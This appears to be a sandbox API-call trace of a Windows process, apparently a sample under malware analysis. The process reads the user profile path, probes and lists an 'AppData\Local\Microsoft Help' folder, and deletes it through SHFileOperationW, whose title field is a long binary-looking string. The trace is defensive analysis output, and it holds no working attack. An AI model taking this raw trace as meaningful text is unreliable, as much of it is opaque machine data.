1 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0248.163] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0248.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0248.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0248.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0248.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0248.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0248.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0248.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0248.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Microsoft Help", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help", lpFilePart=0x8bedfc*="Microsoft Help") returned 0x3a [0248.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0248.164] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft help")) returned 0x2010 [0248.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1140, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa57a0 [0248.165] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1140, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0248.165] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1140, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 0 [0248.165] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0248.165] GetLastError () returned 0x12 [0248.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0248.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0248.166] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0248.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0248.166] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0248.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0248.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.167] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0248.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0248.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0248.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0248.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0248.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0248.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0248.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0248.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0248.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0248.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0248.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0248.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0248.169] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Microsoft Help", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help", lpFilePart=0x8bf658*="Microsoft Help") returned 0x3a [0248.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0248.169] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft help")) returned 0x2010 [0248.169] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\